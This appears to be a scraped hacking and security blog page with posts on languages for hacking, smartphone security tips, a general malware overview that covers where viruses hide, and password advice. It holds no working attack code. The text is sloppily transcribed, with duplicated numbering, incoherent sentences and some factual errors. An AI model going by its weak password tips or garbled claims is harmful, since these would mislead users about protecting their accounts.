2020
All about hacking and cyber security I present ways of hacking over all platforms also trending news & info bugbounty tutorial for penetration testers

 

Best Programming Languages To Learn For Hacking


Before I get into this article, it's very important to recognize that hacking can be dangerous. Don't do it unless you know what you're doing. And you know that what you're doing is legal. Whenever practicing hacking, it should be done responsibly and ethically, or else you could end up in prison, or worse financial turmoil, then you'd be in debt. Like the government. 

There are three fundamental types of hackers white hat, black hat, and grey hat. 

A white-hat hacker is somebody who hacks ethically and responsibly and they use their skills to help catch other hackers. They're also often hired by companies to handle security measures, and build anti-hacking software, which is really important and vital work in the world of information technology, especially now that everything is becoming attached to the Internet of Things. 

Then, of course, we have the Black Hat Hackers, people who use their skills for malicious intent things like creating viruses using keyloggers to steal your information, hacking banks, and even hacking servers, their goal is to break in steal information, and sell it for money. 

Really, nobody likes those guys, because they negatively affect everyone for the benefit of themselves. 

Last but not least, we have the grey hat hackers, people who find themselves somewhere in between. These are usually people that don't have malicious intent. But everything they do is usually self beneficial. 

In general, they auction their abilities to the highest bidder, a gray hat hacker will often look for backdoors and security problems with the system, and then they'll sell the solution to the company for the price. 

Before I can really talk about what language is the best for hacking, you first have to understand that there are different types of hacking, the language, and system you use for a server is not necessarily the same that you'd use for a personal computer before you look for any absolutes is what you should or shouldn't be using, you should recognize that there are many different types of hacking because there are many different types of computer systems. 

Because of this, there are many different languages you could utilize to hack any individual system. There's really two different levels of hacking, high-level hacking, and low-level hacking. 

on the high end of the spectrum, we have the easier to use languages often interpreted or intermediate, Python, Ruby, JavaScript, Java, C#. Because these languages aren't compiled, they're much easier to work with. 

Because everything is compiled on the fly. a language like Java is both interpreted and compiled. This allows it to be incredibly easy to work with. That's why a lot of hackers prefer it, not to mention most of the world servers run on it. 

However, Java is really only useful if you're hacking servers and people's back-end computer systems. Let's say you want to hack a robot, or an electronic device, maybe even a car, the only way to do that is with a lower-level language. 

On the lower end of the spectrum, we have compiled languages like C and c++. And although they're not as easy to use, they are more powerful.

There's very little you can't do with C or c++.

what I wanted to show you were a hierarchical ladder, from the hardware all the way up to the highest level of abstractions. Here we have the CPU or the hardware itself, which obviously runs on electricity and hardware components using electricity since zero and five volts signals to determine what to do internally. 

The 0 in machine language or binary represents false which is nothing in the one represents true or five volts on top of binary and just a little bit abstracted from it is assembly it's really the lowest level human-readable writable language assembly or assembler is a platform-specific language designed for a certain architecture. 

So Mac and Windows may not necessarily have the same assembler because their architecture usually differs. 

But we're not going to get into the different types of assembly and assemblers because that's really beyond the scope of this Article. 

From here we go up to what is likely the lowest level language still in common use today. And that C, C is really close to the hardware for practical language. 

But it doesn't offer many abstractions that people often desire today, such as object-orientation. Because it doesn't offer many of these modern features, the language is more streamlined. 

And one might even argue easier to grasp at first, mostly because it has less bloat. It's strange because C is really easier to learn than most languages in some respects, but it's harder to master. 

And there's sometimes more to know about it, especially because the systems we control with it are generally a lot more complex. However, these days there's not really a lot of languages other than C that retain that low-level ability to program micro-controllers and things of the sort. 

C is a procedural language, and it was really the first language I ever learned. I'm glad I started with C though and if you have a good mind, plus, enjoy reading and studying things for yourself, then I do highly suggest starting there. 

There's really no language on a computer that comes even close to being as supported on as many devices as C and its use is still just as relevant today as it was years ago when I was first introduced. 

It's wild to think how much hardware has changed in that time. But language is really really haven't evolved much at all C is still the world's fastest compiling language supported on multiple systems due to that really low overhead, 

 

 

then we shift a little from here to c++, which is basically c but with object-orientation added to it. And a ton of features. 

Nobody really uses c++ is a wonderful language. But many people who use it especially for lower-level microcontroller engineering, or game hacking will tell you a lot of the features it has come with cons that kind of outweigh the benefits.


C++ is great if you need low-level control, and also that object orientation and extra abstractions. But if you're just looking for something that compiles fast, and has the smallest package possible, you're definitely looking for See, it's funny because the design of a virus or hacking actually has many of the same requirements as traditional programming and development. 

So ordinarily, packaging something really small means quicker delivery to a customer. Well, when you're designing a virus, you take the same exact things into consideration, you want something that's really small and fast and easy to pass over packets over the internet. 

 

Then we get to the intermediate hybrid languages, which are compiled, but they've also interpreted languages like C sharp, and Java. And we get Apple's new wonderful, high-level protocol-oriented language Swift. 

And of course, this list wouldn't be complete without the high-level abstracted languages that basically everybody is learning and using right now for almost everything. 

These are designed for ease of use, but at the expense of control, like JavaScript, Python, Ruby, and so on. Don't get me wrong, these are still very powerful, real programming languages that can do some serious business. 

They're just not designed for low-level micro-controller engineering and programming. 

At the very top here we have HTML and CSS, which contrary to what many people will tell you are absolutely programming languages, they may not use logic to the same extent as a lower-level programming language. But effectively, they're designed for ease of use on the web. 

And they do meet every criteria to be considered a programming language, which is really just a set of instructions telling the computer what to do. 

In short, don't be a fool. Every language has its use, I just think C has the most uses. Some people obsess over what language to use for hacking. 

And although it is important, the operating system is just as important. Most hackers use Linux for good reason. Linux is highly modular and portable by nature. And it supports a vast array of tools for hackers. 

That probably helps if you're not yet familiar with the Linux operating system, that might be a good place to start before you get into programming. The biggest part of being a hacker isn't even knowing a programming language. 

But it's simply understanding how the systems work underneath the scenes, once you understand how things work below, you can break in from above, being a hacker is all about trial and error. 

Sometimes you have to try many things until you get something that works. And often you never do. But this process of trial and error is precisely why so many people love it. It's an incredibly rewarding experience. When you break code that somebody else has made. In many ways, it's competitive like a sport. 

Many people would think that hacking isn't that useful. But the truth is, it's fundamentally necessary to the electronic environment. If we didn't have white hat hackers, and even gray hat hackers, we wouldn't have the ability to defend ourselves against the black hat hackers. 

It's extremely important that every time you're on your phone and you take a selfie or picture, it's safeguarded. And only you can see it. Oh, yeah. Yeah, right there. Yeah, just like that. This is only possible because of the talent and amazing skills of ethical hackers. 

It's of my opinion that if you're new to programming, C is probably the best place to start. Not only is C cross-platform and used on almost every system in the world, but it's also the foundation of almost every programming language today, whether you go on to learn c++, swift, or Java, almost every modern language in the world is heavily influenced by C. 

Even JavaScript, which is now the most used and popular language in the world takes a huge amount of influence from C. That's why we refer to most languages as C style languages. C teaches you the foundations that you need to do whatever it is that you want to do. Hacking included. 

Most servers and systems today are designed on software that's written in modern languages, such as Java, and C sharp, but most of the microcontrollers and hardware running those systems and software are designed on C. 

So if you really want to get low and close to the hardware, C is the best place to be. Even if your goal is to be a general-purpose programmer. Learning C can look incredibly good on your resume, I highly suggest checking c out. 

And if it's not for you to try a different language, something higher level, we live in an age where the security of your information is more important than ever. As the world around us becomes more and more digitized. 

It's more important than ever to safeguard our information and identity. When we see hacks like the Equifax hack that have been recent, we know just how dangerous hackers can be from birth certificates to banking information and even your social security number. Black hat hackers are a reality of life. You cannot escape it. 

Where there is information. There are people trying to steal it. So the only way to control it is to fight fire with fire and find hackers that are willing to do it for ethical purposes. It's because of the hard work of ethical hackers that security measures are even possible to summarize, learn C. And if you can't learn Python or JavaScript,

All about hacking and cyber security I present ways of hacking over all platforms also trending news & info bugbounty tutorial for penetration testers

People are using smartphones more than ever and this trend isn't slowing down anytime soon whether you're new to smartphones or not you should know that they can be a huge target for hackers smartphones contain a lot of your personal information which can give someone else all they need to steal your identity or your digital data. 

    17 Tips To Secure Your Mobile Phone From Hackers

    Smartphone hacking is a profitable enterprise because hacking into smartphones is simple it's because it's so deserving your phone is an integral part of your life with so much anything before its passage into your phone is access into your mind.


    1.Strengthen your password

    Some of us might look back at the good old days  when having a password was a few  characters long it was easy to remember  and you didn't need something that  looked like it spilled out from the  matrix unfortunately these days it's too easy to guess a standard password so it  needs to be uncrackable here are some  tips for making your password a little stronger.

    • combine old passwords with a  new one to get super charged passwords  you can add the name of your favorite animal or food with the year you first  knew that add that on to the end of any  password you already have to make your password uncrackable  since most social media sites allow up to 15 characters for passwords keep your login original characters and numbers are fine but adding symbols and other special characters can really take your password up a notch.
     

    2.Device encryption


    This one is apparently authorized by default to double-check research for encrypt device in your Settings app and follow directions on the protection when more traditional Android gadgets you should have your gadgets charged and plugged in during encryption and set and remember password

    2.Device encryption
     

    You should additionally arrange your device to delete all the data on your phone after too several improper tries this protects your device from facing brute-force attacks when somebody gets physical access encrypting your phone does not protect you from malware or remote exploitation device it only works if a phone gets stolen.



    3.Be smart on social media Sites

    Social isn't nearly as private or protected as you may think in the old days you could easily block people from looking at your information but with the size of Facebook, it's rare that your profile is truly private to maximize your safety always click the settings that only allow your friends and family to see your posts and pictures unless you know someone who wants to be your friend.

    Be cautious about accepting friend requests fake profiles can fool you into thinking you know that person a quick look at their friend list and recent posts tell you if they're active in a group or not never look at a message to a friend requests with links that look and feel fishy some sneaky hackers can copy friends emails and send messages with link s hoping you'll press the link by the time you do you'll be suckered into giving up the info you didn't want to be stolen worse yet you could be locked out of your own profile account if they steal your password too so always be on the lookout for suspicious messages.

     

    4.Enable 2FA (Two Factor Authentication)


    Enabling 2FA can double your Security and if combine with strong password Always Enable 2FA for your Social Media and Important sites so if your Password Gets compromised you have OTP to secure your account from hackers.
     

     

    5.Don't use open or Public  Wi-Fi


     Free High-speed WiFi is something that only a few can resist but this WiFi lurking with some very serious dangers you should need to aware of.

    5.Don't use open or Public  Wi-Fi

     

     Clicking on a link or popup from free WiFi can be very serious if a hacker is also using that WiFi he can hijack sessions of yours and do whatever he wants from your accounts. or us tools to find credentials

    This can be used as identity theft and your all information is being used by the wrong person. Disable your WiFi and network also for safety and use password of course.

    Using VPN and TOR can also work they hide your identity from ISP and Browsers


    6.Add more protection


    Just like your home computer you need a good firewall to protect your internet connection luckily new phones do a bit more than that every phone has its own firewall though you can always add more security apps to be double sure and this is a measure.

    Some apps work better for Android than they do for iPhone but there's plenty of software available a quick look through the Apple Store or Google Play app list will get you started some app names such as Norton Avast and McAfee are your best 

    It doesn't hurt to add this extra protection to your phones firewall apps protect you from select dangers to help keep your ID and info safe while others just target viruses when it comes to overall coverage find an app that offers complete packages choose what's best for you

    7.Add more protection


    7. Don't answer fishy and scammy unknown numbers


     The only scams we used to encounter were rudimentary email scams that were incredibly obvious who would fall for that these days well to say it's still happening to those who own a smartphone - 

    Did you ever get a missed call with an area code you don't recognize while most of these get blocked by your phone automatically some can slip through chances are if you call back that number you'll be sorry you did the trick to this is that your call is routed through an international premium rate number and can charge you way more than your monthly bill and it's more common than you think if you call back that number the cost of the call gets paid to the hackers these one-ring calls are the typical signs of this scam so you'll think you missed an important call don't be sucked into losing your money just erase or block the number you won't be called by that number ever again hopefully your smart phone will block other calls from that same area code as well. 

     

    8.Use cloud storage 

     cloud storage allows you to store important information and files in a location that's not on your phone this can be smart because it means the files aren't located on your phone if your phone is lost stolen or damaged you won't lose any of the data in cloud storage.

    Most importantly this means your information can be kept out of the hand of hackers cloud accounts are pretty hard to crack so even if you have an account on your device it'll be safe these accounts often have double password encryption so no to login attempts are the same you might need a second login code sent to your mobile number to complete a cloud login this keeps hackers from getting the information you want to keep private while it might seem odd to put private information into cloud storage.

    10.Use cloud storage

    It's not such a bad idea having a mobile device clutter-free when you use it for business means you don't have to worry about misplacing files or running out of storage this also helps you travel light wherever you go and you won't have to worry about losing your pen drive that could fall into the wrong hands.

    Secure backup cloud and syncing if you're using backups or syncing make sure they are encrypted as well cloud backups are oftentimes an easy target to steal your private data secure your accounts with 2fa if you use Google Drive or iCloud your cloud backups use the same 2fa as your remained Google account or Apple ID connected to your phone if you decide to trust your default providers you're not in control of the security of your data  people holds or decryption keys and they can access your data in the iCloud  any time they want and I think only you should be able to decrypt your data crypto matter allows you to create encrypted vaults and automatically sync your secure backups to the cloud surveys of your choice if you don't pay for the service you are so I would recommend to go for next cloud you can  get between two to five gigabytes of cloud storage for free but it might not be enough for those of you taking plenty of high-resolution photos but next cloud is free and open-source and many providers even offer instant encryption  so this is the is the cloud service that  you should go for .


    9.Check app permissions 

    All apps of settings that allow app permissions tell the app what it can and can't do when it's connected to the Internet some of the common options include whether an app can access your photos contacts our camera and microphone.

     this is really important that you might not want your audio or visual gadgets to be used by other people these settings also control the amount of info given about your self and the information that's stored on your phone if these app settings are set up to your approval then you won't have to worry about that info being leaked often some hackers target certain apps that don't have secure internet connections your live images could be stolen through your phone or tablet and you never know where they could end up after that worse yet is that your
    private info can be sold to marketing agencies who will target you just from your mobile search history no it's not just Facebook that does it numerous third-party app pirates like to sell your private info too this can be avoided by checking your app permission settings on every app you decide to download.


    10.watch out for phishing apps 

    By now you have a good idea what phishing means and those who get hooked weren't being careful online game apps look attractive and have lots of flashy advertising which is a bit like a worm on a hook.

    12.watch out for phishing apps

     

    If you ever knew someone who likes sport fishing they use special bait to lure and catch their fish the same works for game apps that tempt you with flashy graphics before taking your information you'll know when you set these apps because they aren't on the official app sites such as Google Play or the Apple Store often they're traps that show up on rabbit-hole web sites.

    This is where you click on a link to a second web site which takes you through a string of different web sites you never actually get to the web site that you're looking for it can seem endless at times and this is where you start to see very familiar app game links these are usually copycat games that look just like the official ones but they're not they trick you into giving up all sorts of information to play the game they can also hack your phone giving them access to your private info for them to exploit don't ever fall for this kind of fishing bait.


    11.activate your phone's security features 


    New mobile devices give you lots of choices to protect you from getting hacked there isn't a smartphone out there today that doesn't have software filters that spot apps or files with dangerous malware.

     this is similar to software and computers which will prevent you from installing software that is detected to be unsafe antivirus blockers for apps are easy to turn on inside your smartphone settings they're specifically designed to look for malware and app games if a game doesn't download chances are the app could be harmful to install.

    This is also great for kids who might not fully understand the apps they're clicking on or downloading once again if your device thinks it's not good for downloading you don't want to risk being hacked make sure you stick with official games that come from sources that have already screened their app games but even Google Play and Apple Store apps can have malware that's hidden somewhere so always activate your virus app blocker to be on the safe side.


    12.Go beyond passwords 


    Having your smartphone stolen is about the worst thing you can imagine then again if they can get into your phone because you don't have a password set up you're in real trouble fortunately there are some innovative things you can do to prevent thieves from getting your information too easily 

    New apps and models now allow fingerprint identification to unlock a phone for it to work you press a touch screen window holding your finger down if your print doesn't match the exact image that's stored in the phone's memory it won't open this can also be combined with a two-step process that uses a fingerprint and a password in addition you should also install a mobile tracker.
    this can be activated as soon as you notice your phone is missing an owner can then track their phone via the app and catch whoever is carrying your stolen goods some apps will even allow you to delete the info that's stored on the phone in an emergency but as long as you can get your phone back in one piece that's probably the best solution better call the police for help once you finally track down your phone.

    All about hacking and cyber security I present ways of hacking over all platforms also trending news & info bugbounty tutorial for penetration testers

    In this article, I'll be discussing a series of lessons on Cyber Security, with today's topic focusing on malicious code, which is also known as malware.

      What is Malicious Code (Malware Definition)?

       Malicious code or what malware is software that is written for the purpose of intentionally causing some sort of unanticipated or undesirable effects

       

      Note that the terms malicious code, rogue program, and malware all refer to the same underlying concept, and I will hence use these terms interchangeably. 

      From a conceptual perspective, one of the most critical things to understand about malicious code is that it is only distinguished from other types of software programs by the intent of its developer

      If a developer writes a software program, with the goal of causing harm to other people or systems, or at least problems for other people or systems, then we can classify that software program as malicious

      Since the only conceptual difference between malicious software programs and non-malicious software programs is the intent of the developer, it's important to realize that malicious programs can do anything that a normal non-malicious program can do. 

      Just as with a normal non-malicious program, malicious software programs can access and use system resources and can alter both data and other programs residing on a system if that's what they've been designed to do. 

      Although many people have the impression that malicious code is a relatively new concept. 

      In fact, researchers have been aware of malware threats for many many decades. virus behavior, for example, was described by Willis were as a threat to computing systems in his 1970 study for the defense Science Board. Remarkably, many of the concerns and threats that were documented in this early report are still perfectly valid even today.

      Malware (Malicious Code) Full Guide (Viruses,worms,etc)


      Many different types of software programs can be classified as malware, with some of the most common types of malware being viruses, worms, Trojan horses, zombie programs, logic bombs, time bombs, rabbits, trap doors, and script attacks.


      Perhaps one of the most well-known types of malware is a virus. 

      What is Virus?

      In the context of information security. A virus is a hidden, self-replicating computer program that propagates itself by infecting other programs or system memory. 

       Note that viruses can be broadly classified into two groups, transient viruses, and resident viruses. 

       

      transient viruses are those viruses that are active only when their host programs are executing.

       While resident viruses are those viruses that establish themselves in system memory and have the ability to remain active even after their host programs have been terminated. 

      We'll examine viruses more closely a bit later. 

      What are worms?

       Although a worm and a virus have many similarities, a malware worm is distinguished from a virus by its ability to propagate a complete working version of itself onto another machine or device by means of a network. 

       

      What is a Trojan Horse?

       Trojan horse is a computing program that appears to have a useful function, but which also has a hidden and malicious purpose. 

      Trojan horses are commonly able to evade security mechanisms by exploiting the legitimate authority of the user who runs the program. 

      Imagine, for example, that you downloaded a game app for your smartphone. When you launch the app, you're able to play the game. But unbeknownst to you, the app has secretly made a copy of all of the information in your contacts list and has transmitted that information to a remote server. 

      Aside from viruses, worms, and Trojan horses, several other types of malicious code exist as

      What is zombie?

      for example, is a malicious program that is designed to allow a computer to be controlled remotely by a master machine. 

      computers that have been turned into zombies are often used by malicious parties for purposes such as launching a distributed denial-of-service attack against a target organization or network. 

      What is the Logic Bomb?

       a logic bomb is a type of malware program that is designed to activate itself when certain conditions are met.

       One of the most popular types of logic bombs is called a time bomb, which is a logic bomb that activates at a specified date or time.

       Time bombs can be used by malicious parties for purposes such as launching a distributed denial-of-service attack, on a holiday, or on the anniversary of some event. 

      What are Rabbits?

      With respect to viruses and worms, a rabbit is a virus or worm that replicates itself without limit for the purpose of draining or exhausting system resources. 

      In the real world, rabbits are well known for their productivity to reproduce in large numbers. If the population of rabbits is constrained to an area with a limited supply of resources, eventually the rapidly growing number of rabbits will consume all of the available resources. 

      One of the characteristics of computer systems is that they also have limited resources. And I hope this example makes it clear why a virus or worm that replicates itself without limit is known as a rabbit. 

       What are Trap doors or Backdoors?

       Trap doors, which are also known as backdoors are hidden software devices that are installed by a malicious party in order to gain surreptitious access to a computer system while avoiding or circumventing the system security mechanisms. 

       

      What are Script attacks?

       Script attack refers to malicious code that has been written in a scripting language such as JavaScript that is designed to be downloaded and executed

      When a user loads a webpage. Script attacks capitalize on browser vulnerabilities, or the web's same-origin policy in order to gain access to sensitive or private information. Script attacks are quite popular and have been found by recent research to account for at least 80% of the security vulnerabilities on the web. 

      There are, of course, many other varieties of malicious code. But the nine types of malware described previously provide a solid representative sample of current malicious code based threats.

       Although many malware programs are indiscriminate, that is, they are not selective in the people or systems that they attack. It's important to realize that there are also many targeted malicious programs that have been written for a very specific purpose. 

      What is a Targeted Malicious Code?

      Targeted malicious code might be designed to attack a particular system, organization, application, or network, or to carry out a very specific malicious task. 

      An excellent example of targeted malicious code is the Stuxnet worm, which was specifically designed to infect the programmable logic controllers on the Siemens industrial control systems that we're being used by the Iranian government in its efforts to enrich uranium. 

      A useful way of studying and classifying malicious software programs is to evaluate those programs from four different perspectives. 

      • we can consider the extent to which a malware program causes harm. And we can accomplish this by determining how the program negatively impacts users or systems with respect to harm. Remember that malware programs often run with the full authority of the user. And if a user has high-level system access, malware programs can hence cause essentially unlimited harm to a system.  
      • we can consider the way in which a malware program transmits or propagates itself. And we can accomplish this by determining how the program replicates and spreads. malicious programs can potentially transmit and propagate themselves in many different ways, including via files, downloads, documents, scripts, networks, and so forth. 
      • we can consider the ways in which a malware program becomes active. And we can accomplish this by determining how the program establishes itself and gains control of system resources. Many different activation vectors exist for malicious programs. And most of these exploits some sort of system vulnerability.
      • we can consider the stealth characteristics of a malware program by determining how the program hides itself to avoid detection. In order for a malicious program to survive, it must avoid being detected not only during the installation process but also while it is executing and while it is dormant or inactive. Further, once a malicious program has been detected, instances of the program must be removed faster. The program can propagate itself if we hope to cleanse the infection. 

      As promised, we will now take a closer look at how computer viruses work. 

      Recall that a virus is a hidden self-replicating computer program that propagates by attaching itself to other programs. This means that the host program to which a virus is attached must be executed at least once in order for the virus to spread. Recall also that a certain type of virus known as a resonant virus, can establish itself in system memory and can remain active without its host.

      For this reason, even a single execution of the host program can be sufficient to spread the virus widely. 

      Let's consider a few examples of virus propagation. 

      First, imagine that a virus is attached to a program installer file. A user will hence activate the virus when he or she runs the installer program. After being activated, the virus might install itself in all of the programs currently executing in the system's memory. From this point, the virus will spread further whenever any of the infected programs is executed. 

      As another example, imagine that a virus is contained in an attachment to an email message. In this case, the user might activate the virus simply by opening the attachment. From this point the virus can install itself and spread throughout the user's machine.

      Classification of Viruses

       viruses can be classified into four different categories according to the ways in which they attach themselves to their host programs. 

      Classification of Viruses

       

      • Appending viruses

       Appending viruses and appending virus attaches itself either to the beginning or to the end of a host programs code. 

      Most often, appending viruses insert themselves into an executable host program in front of the first legitimate program instruction. In this way, the virus code will run whenever the program is executed. 

      • Surrounding viruses

       A surrounding virus attaches itself to its host program in such a way that it will execute both before and after the host program executes

      developers of surrounding viruses often use this strategy in order to allow the virus to cover its tracks. That is, the component of the virus that runs after its host program has finished executing can be used to mask the presence of the virus. 

      • Integrating viruses

       Integrating viruses incorporate themselves into the middle of host programs legitimate program instructions, thus defeating antivirus software that looks for virus signatures at the beginning or end of an executable program file. 

      • Replacing viruses

       Replacing viruses, which are designed to entirely replace the real, legitimate code of the infected program file

                                                      --------    

      The Perfect Virus...

      From the perspective of someone wishing to design a virus, there are several highly desirable virus characteristics that the designer can seek to incorporate into his or her virus. 

      An ideal virus should be difficult to detect, not easy to destroy or deactivate, and should propagate itself widely and rapidly. 

      Further, an ideal virus should be able to reinfect programs that have previously been infected and should be machine and operating system independent. 

      With respect to the latter of these considerations, imagine how effective a virus would be if it had the capacity to infect any type of device, including smartphones, tablets, PCs, and servers, running any type of operating system, be it Windows, Mac OS, Linux, Unix, iOS, Android, or so forth.

       

      Now that we know a bit about how computer viruses attach themselves to their host programs, we can consider the question of 

      where to hide a virus?

      • viruses can be hidden in many places on a computer system, including the boot sector, in the system's memory, in application programs, in library files, and in many other widely shared files and programs. arguably the best place for a virus to be hidden is in a machine's boot sector.


      • A boot sector is a region of a storage device that contains program code, which allows a computer to load its operating system. When a computer is powered on the BIOS loads the program code from the boot sector into the computer's memory. The computer then executes To this program code in order to initialize its operating system and complete the boot-up process. 
      • Since virus-detection programs are application programs, the operating system must be running in order for a virus detection program to be running. by hiding a virus in the computer's boot sector, then, the virus may be able to avoid detection, since it will have been activated before any virus detection programs were activated. 
      • Another common place for viruses to be hidden is in system memory. on modern computing devices, it is common for hundreds of programs to be executed upon system startup. 
      • If any of these programs are infected with a virus, the virus might propagate by attaching itself to the other programs currently contained in the system's memory. In this way, even if the original host program is terminated, the virus will continue to be active.

       Operating System programs or common user programs are good targets for this type of virus since such programs are likely to be activated often. In addition to hiding viruses in the boot sector or in system memory, viruses can also be hidden in application programs. 

      There are certain applications that allow users to write and execute macros, and these macro-enabled applications have proven to be common targets for viruses. 

      • Since clever virus developers have been able to exploit security flaws in those applications in order to propagate and run malicious code. library files such as DLL files are also a common target for viruses because they are used by or shared by many different programs. When any of the programs that rely upon one of these shared library files are activated, the virus in the infected library file will also become active, thus allowing it to rapidly propagate. Other widely shared files and programs may also be good targets for a virus. 

      It's possible for example, for a virus to be hidden inside of a data set that is shared by many users, thus allowing the virus to spread quickly. 

      • Another interesting place to hide malicious code is inside digital images such as JPEG files. There is in fact an entire science, known as steganography, which examines how information can be concealed. Many methods and tools have been developed in recent years, which allow malicious code and other information to be secretly hidden inside common types of computer files. And these files are thus good targets for viruses. 
      • Finally, and amusingly, a good place to hide a virus might be inside of a disreputable virus detection program. Users who acquire and activate such a program in the hopes of preventing a viral infection may by doing so, actually cause their system to become infected. 

      Virus Signatures and its Pattern

      In order to understand how viruses are detected, we first need to understand that viruses leave behind a unique signature, which can be defined by one or more patterns. 

      If a virus is to survive a hard reboot, that is a reboot in which the power to the computer is switched off and then switched back on, it must be stored somewhere on the computer's non-volatile storage device, such as a hard disk or a solid-state drive. 

      This creates a storage pattern for the virus. Further, a virus interacts with system resources in a particular way while the virus is running. 

      And these interactions create an execution pattern for the virus. Finally, a virus spreads or propagates itself in a particular way, thus creating a distribution pattern for the virus.

       virus scanning programs use one or more of these types of patterns in order to detect viruses. Such software programs may scan the system's memory, or its hard disks or solid-state drives, including the boot sector in an effort to detect any virus activity on the machine. Additionally, virus scanners can use techniques such as file checksums, in order to detect changes to important files.

      Virus Scanning and Removing Programs...

      Virus Scanning and Removing Programs.

       

      When a virus scanning program finds a virus, it will typically try to remove it by extracting all of the pieces of the virus from its host programs and from the system's memory. 

      One of the major challenges faced by virus scanning programs is polymorphic viruses, which are designed to modify their signatures as they execute in order to avoid detection. 

      Note that there are typically hundreds of new viruses identified every day. And as such a virus scanner and its database of virus signatures must be kept up to date in order to be effective. 

      Virus Removal and Post-infection Recovery

      fixing a system after it has been infected by a virus might be accomplished in a number of different ways, depending upon the virus and the nature of the damage that it is done to the system. 

      Ideally, we would want to disinfect the system by removing the virus from any infected programs without damaging the programs themselves. Unfortunately, this can only be accomplished if the virus code can be separated from the program code. And if the virus did not corrupt the program.

      If the virus cannot be separated from the program file, then the file must be permanently deleted. If one or more files is deleted by the virus itself or are deleted in the process of disinfecting the system, then restoring the system to its original state will require that we recover or replace all of the deleted files. 

      This emphasizes the need to maintain file backups, especially of important files. Without backup copies of the files that have been deleted either by the virus itself or as a consequence of the disinfection process, it will be extremely difficult to restore a system to its original state. 

      identifying a digital object has been modified by malware

      Among the most important tools that we have available for identifying when a digital object has been modified by malware, our error-detecting codes there are several varieties of these error detecting codes, including parody bits, checksums, and cryptographic checksums, which, when used properly, can help us to detect when a program or file has been surreptitiously altered by a malware program. 

      A parity bit or a check bit is the simplest form of error detecting code. The process involves appending a single bit of data, either a zero or a one to a string of binary data, in order to indicate whether the number of ones in the string is even or odd. 

      If the binary data in the string has been altered, and there is a 50% chance that the parity bit will detect the modification, a checksum is a value that is computed by running a file through a hash function or a checksum algorithm

      Because the hash function or checksum algorithm will produce different values for different combinations of input data. the integrity of a file can be verified by computing the file's checksum and comparing the result to a known checksum value. If the two values differ, then we can be reasonably sure that the file has been modified.

       The developers of malware are, of course, generally quite clever, and many of these clever developers have found ways of modifying programs or files, such that they generate the same checksum value as the unmodified program or file, thus making it appear as if the program or file has not been altered. 

      For this reason, a cryptographic hash function can be used to generate a checksum value that has an extremely low probability of being duplicated after a file has been modified. It is also important to note that, under certain circumstances, error-correcting codes can be used to restore programs or files that have been surreptitiously altered to their original state without requiring a clean, unmodified copy of the original object.


      Reducing Harm from Malware Infections

      Reducing Harm from Malware Infections

       

      In addition to checking whether digital objects such as programs or files have been surreptitiously modified, there are also several mechanisms that can be used to reduce or contain the harm caused by a malware infection. 

      First among these is the principle of least privilege. This principle states that users should have access to the minimum number of digital objects and system capabilities necessary in order to perform the tasks that they need to perform. 

      A malware program that runs with the authority of a system administrator has the potential to cause much more harm than if the same malware program were run with the authority granted to a low-level user account. 

      Second among these mechanisms is the principle of complete mediation. This principle states that we should check whether a user is allowed to use a digital object each and every time. Access to the digital object is requested. 

      Finally, we have the mechanism of memory separation. When implemented properly, memory separation ensures that each user's digital objects are isolated in memory from other users' objects, thus preventing cross-contamination. It is important to realize that most single-user systems, such as home computers, laptops, tablets, and so forth, are not properly configured to capitalize on hierarchical code sensitivity and capability. 

      Since most people use a single user account on their personal computing devices, which has high-level administrative access to the system. 

       

      How to Be Secure from Malware..? 

      How to Be Secure from Malware

       

      Just as with Malware infections, adopting proper malware hygiene can help us to substantially improve our chances of avoiding a malware infection. 

      •  It's good practice to use up to date anti-malware software that has been supplied by a trustworthy vendor.
      • New or unknown software programs should always be tested on an isolated device if possible, especially if the software is to be used in an organizational environment. 
      •  Users should be trained to recognize and open only safe attachments and data files. 
      • Users should be made aware that any website might be harmful, even if the website has been safe in the past.
      •  If restoration of the system becomes necessary, it's important to keep a recoverable system image in a safe place and to have backup copies of executable system files available. 
      Even with all of these hygienic precautions, there are still no absolute guarantees that we can avoid a malware attack. By following these steps, however, we can vastly reduce our chances of acquiring a malware infection

      Interesting facts about Malware

      As food for thought in our consideration of malicious code, I would like to discuss some truths about malware. 

      • Malware can infect any platform. 
      For many years, there has been a persistent belief that devices running Mac OS or iOS operating systems are immune to malware attacks. This belief is absolutely false. All computing systems can be affected by malware. 
       
      • Malware programs can modify hidden and read-only files. 
      Many people believe that if a file is hidden or marked as read-only, then it will be immune to modification by malware. Remember that malware programs often run with elevated privileges, and can easily change whether a file is hidden or read-only. 
      •  Malware can appear anywhere in a system. 
      Many of the developers of malicious programs are extremely intelligent and extremely talented. And there are hence no dark corners anywhere in a computer system that is immune to malware. 
       
      •  Malware can spread anywhere where file or data sharing occurs. 
      Malware programs have many ways to propagate themselves, and we should therefore not expect any communications channel to be safe from malware.
       
      • It is not possible for malware to remain in volatile memory after the power to a system has been completely switched off. 
      Nevertheless, if a malware program is saved on a disk or a solid-state drive, for example in the boot sector, then it may reappear when the power is restored. 
       
      • It is possible for malware to infect the software that runs hardware devices. 
      firmware viruses do exist. 
       
      • Malware can be malevolent, benign, or benevolent. 
      Although the vast majority of malware is written with malicious intent. The same techniques that are used to develop malware programs, such as viruses and worms can be used to achieve positive or munificent objectives. 
       
      As an example, consider this question. Would you mind having a  virus living on your system? 
       
      Well, This ends our overview of malicious code. I hope that you learned something interesting in this lesson. 
       have a great day.

      and Happy Hacking...

      All about hacking and cyber security I present ways of hacking over all platforms also trending news & info bugbounty tutorial for penetration testers

       As technology advances overtime, it's been positively used to assist sell corporations, services or products in addition to improving websites. But at some point, it has been negatively also used by culprits to "crash" websites and businesses even hacking passwords to the software.

       As the increasing variety of instances of hackers used to hack websites or malware attack stated in information, horrific impact brought approximately via technology is also continuously rise System hacking is one of the most common issues nowadays.  

      Cyber Security Threats


      That is why to settle this problem, security concerns and issues have been tackled because Internet is now widely use by people from all walks of life. Whether a business is large or small, proper attention should be given like protecting and safeguarding all their network software against corrupt hackers.

       That is why it is vitally important that every system operators or administrators must use a distinctive password that can't be hacked either by an ordinary destroyer or professional hackers. As early as possible, one should be vigilant from unexpected hackers.


      Basically, a person who does hacking commonly destroys software and other computer networks in order to gain more money or only encourage doing the challenge. To avoid unnecessary accidents like hacking passwords, you should take some precautionary measures not only for your systems protection but also for your own safety as well.

       That is why the need of powerful password is a must for privacy and security of your website. It ensures you the confidentiality and safety of your save data. It is a great responsibility of the user to make a password as unique as possible in a way that complicated to guess or to be discovered by anyone.


      To avoid hacking on your password, the following are the points to consider when creating a virtual keyword.

       

       

      avoid hacking on your password


